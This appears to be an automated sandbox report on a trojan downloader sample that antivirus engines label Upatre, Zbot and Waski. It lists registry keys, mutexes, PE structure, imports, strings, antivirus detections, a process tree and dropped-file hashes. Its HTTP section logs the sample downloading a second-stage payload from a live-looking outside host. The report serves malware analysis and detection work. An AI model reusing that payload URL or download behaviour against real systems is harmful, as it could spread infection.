\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\tmpie.exe
HKEY_CLASSES_ROOT\Applications\tmpie.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Wow\CpuEnv
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004
ShimCacheMutex
Groove:PathMutex:[LUt+jL/YbxUWwjk7hRky++rqRco=]
_!MSFTHISTORY!_
c:!documents and settings!user!local settings!temporary internet files!content.ie5!
c:!documents and settings!user!cookies!
c:!documents and settings!user!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex

PE Imphash

f05eb749a5202c19233659e352176ac2

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000155a 0x00001600 6.35839963178
.data 0x00003000 0x00000566 0x00000600 1.58325390927
.rsrc 0x00004000 0x00002ad8 0x00002c00 4.69595626052

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00004150 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x000066f8 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US MS Windows icon resource - 1 icon
RT_VERSION 0x00006940 0x00000194 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x00006710 0x0000022e LANG_ENGLISH SUBLANG_ENGLISH_US XML document text

Imports

Library USER32.dll:
0x401028 SendMessageA
0x40102c MessageBoxA
0x401030 DefWindowProcA
0x401034 CreateWindowExA
0x401038 BeginPaint
0x40103c GetWindowRect
0x401040 DrawTextA
0x401044 EndPaint
0x401048 GetMessageA
0x40104c ShowWindow
0x401050 UpdateWindow
0x401054 PostMessageA
0x401058 SetCursor
0x40105c SetCapture
0x401060 TrackPopupMenu
0x401064 GetKeyState
0x40106c GetWindowTextA
0x401070 RegisterClassA
0x401074 DispatchMessageA
0x401078 GetDlgItemTextA
Library KERNEL32.dll:
0x401008 GetProcessHeap
0x40100c LoadLibraryA
0x401010 GetModuleHandleA
0x401014 CloseHandle
0x401018 GetStartupInfoA
0x40101c GetVersionExA
0x401020 HeapAlloc
Library COMCTL32.dll:
0x401000 None

Strings

!This program cannot be run in DOS mode.
`.data
stebelete
oldtengo
gegeout
static
button
Kernel32.dll
RichEdit
Riched32.dll
Uk9|Yk
!<cHGh
Uk9aD`
~kMhNh
`|(B_@
~k#{+G
Tg!Ixm
Uk9aD`
bO!@Dg
`a.IXw
[`9IYj
w}9{+M
|j!I+M
Wv(O^p
QDX'/}R
ac.CX*
7}h_+!
yl"C@*
wx$_Bk
`g=XX+
WAVAf9
K<F$z*y
GetDlgItemTextA
GetWindowTextA
RegisterClassA
TranslateAcceleratorA
GetKeyState
TrackPopupMenu
SetCapture
SetCursor
PostMessageA
GetWindowRect
SendMessageA
MessageBoxA
DefWindowProcA
CreateWindowExA
BeginPaint
DispatchMessageA
DrawTextA
EndPaint
GetMessageA
ShowWindow
UpdateWindow
USER32.dll
GetVersionExA
GetStartupInfoA
CloseHandle
GetModuleHandleA
LoadLibraryA
GetProcessHeap
HeapAlloc
KERNEL32.dll
COMCTL32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="*"
name="Company.Product.Name"
type="win32"
<description></description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
</dependentAssembly>
</dependency>
</assembly>
IDR_VERSION1
VS_VERSION_INFO
FileInfo
FFFF06E2
FileVersion
1.0.1.2
ProductVersion
1.0.1.2
CompanyName
ZoCorporation
ProductName
VFileInfo
Translation

Antivirus Signature
Bkav Clean
MicroWorld-eScan Trojan.GenericKD.1652103
nProtect Trojan/W32.Bublik.19456.I
CMC Clean
CAT-QuickHeal TrojanDownloader.Upatre.r3
McAfee Generic.sj
Malwarebytes Trojan.Downloader.UPT
Zillya Clean
AegisLab Clean
K7AntiVirus Trojan-Downloader ( 0040f7f11 )
K7GW Trojan-Downloader ( 0040f7f11 )
TheHacker Clean
NANO-Antivirus Clean
F-Prot W32/Trojan2.ODVY
Symantec Trojan.Zbot
Norman Upatre.CJ
TotalDefense Win32/Upatre.EdVdXFC
TrendMicro-HouseCall TROJ_UPATRE.AAN
Avast Win32:Trojan-gen
ClamAV Clean
Kaspersky Trojan.Win32.Bublik.clmd
BitDefender Trojan.GenericKD.1652103
Agnitum Trojan.DL.Waski!
ViRobot Trojan.Win32.Zbot.19456.B
Ad-Aware Trojan.GenericKD.1652103
Sophos Troj/Zbot-IEA
Comodo Clean
F-Secure Trojan.GenericKD.1652103
DrWeb Trojan.DownLoad3.28161
VIPRE Win32.Malware!Drop
AntiVir TR/Necurs.H.1
TrendMicro TROJ_UPATRE.AAN
McAfee-GW-Edition Generic.sj
Emsisoft Trojan.GenericKD.1652103 (B)
Jiangmin Clean
Antiy-AVL Trojan/Win32.Bublik
Kingsoft Clean
Microsoft TrojanDownloader:Win32/Upatre.V
SUPERAntiSpyware Trojan.Agent/Gen-Necurs
AhnLab-V3 Trojan/Win32.Zbot
GData Trojan.GenericKD.1652103
Commtouch W32/Trojan.AZAS-5859
ByteHero Clean
VBA32 Clean
Baidu-International Trojan.Win32.Waski.A
ESET-NOD32 Win32/TrojanDownloader.Waski.A
Rising Clean
Ikarus Trojan-Spy.Zbot
Fortinet W32/Agent.SQW!tr
AVG Downloader.Generic13.CCCX
Panda Generic Malware
Qihoo-360 HEUR/Malware.QVM20.Gen

Process Tree

  • report_7492740375439754.scr 1088
    • smcos.exe 2004
      • ntvdm.exe 172

report_7492740375439754.scr, PID: 1088, Parent PID: 1824
smcos.exe, PID: 2004, Parent PID: 1088
ntvdm.exe, PID: 172, Parent PID: 2004


HTTP Requests

URI Data
http://aflakbook.com/classes/images/e2304USm.tar
GET /classes/images/e2304USm.tar HTTP/1.1
Accept: text/*, application/*
User-Agent: aaaaaaa bbbbbbbbbb
Host: aflakbook.com
Cache-Control: no-cache

http://aflakbook.com/cgi-sys/suspendedpage.cgi
GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: text/*, application/*
User-Agent: aaaaaaa bbbbbbbbbb
Host: aflakbook.com
Cache-Control: no-cache
Connection: Keep-Alive

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

Dropped Files

File name autoexec.bat
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
Yara None matched
File name tmpie.exe
File Size 5861 bytes
File Type HTML document, UTF-8 Unicode text, with CRLF line terminators
MD5 3c4831b6a234d0de88b9c2c9ba3a6b10
SHA1 e9c9d82f0b161949c2c0f258f4a6dc9a49575f69
SHA256 e690af2a93fd15309bb26586296d172c92a38ee8b660233a32661cd73fed184e
CRC32 5A1E5267
Ssdeep 96:kggsVjbhjLlIk6HIVdDzE7Jx41TZkE0+nE1UUE0bEbTvBm3xvBm39Cs7JAv5Eed5:klsVvhHbJzENxwV0IEGUEGEXBKBWNKV/
Yara None matched
File name report_7492740375439754.scr
File Size 19456 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 09cd9eb12effac3a5e9bcb83673d9807
SHA1 baad2cf8a7d25ffa752fccea7575b13009e19a12
SHA256 74f539fae25299555afbc1a090d639fe2eb5db123226cc4b39a27ae1e3a6278d
CRC32 8B8ED7A4
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92G:gkNDkPL40XAsBHrAdQ4WBP82wU2G
Yara None matched
File name scs3.tmp
File Size 2686 bytes
File Type ASCII English text, with CRLF line terminators
MD5 4a587187d760161311010b03417b3c3f
SHA1 863bbf5f7f4114a1307c6bad5dd89224d511fed5
SHA256 b7792de7a6d7abb649a8a22e9048d0468b604ca98b8978bdd1171356af6d5f49
CRC32 7F49CEE2
Ssdeep 48:OxFSPnXOoz6xGGBkIV2SVFI8Ag52hG4VYEz/ss10hdmDpaQcaJ0jpn:im9OGGqcxF3whG8YEz/UmXzJ0jpn
Yara None matched
File name smcos.exe
File Size 19574 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0ad407a168aa1d2545241bb182b02033
SHA1 f30a413c305997d3abf3eb12fd9afa7cabcd2dc7
SHA256 26317724a89bb875b7746d0f42df2c380bb72769a62cb14a7a988bfe77e49b49
CRC32 A16649DA
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92Ga:gkNDkPL40XAsBHrAdQ4WBP82wU2Ga
Yara None matched
File name scs4.tmp
File Size 1670 bytes
File Type DOS batch file, ASCII text, with CRLF line terminators
MD5 71f4b39c5eb73df738ad3e0dacd89057
SHA1 8565ed558ad273232104e0b10cd87cff723a1eca
SHA256 d504b1c272cd0c92c4a365086cf884a4889653c89d5602b6dadeffb33b83951d
CRC32 57C5BF94
Ssdeep 24:FdM2fMOL31HImyqulppIqZYGZ+Dg8pAcM3s+5slwQT3eAbntJPFBfPCZ:wTOIqu5/Z+K7slwQTvntJPPPCZ
Yara None matched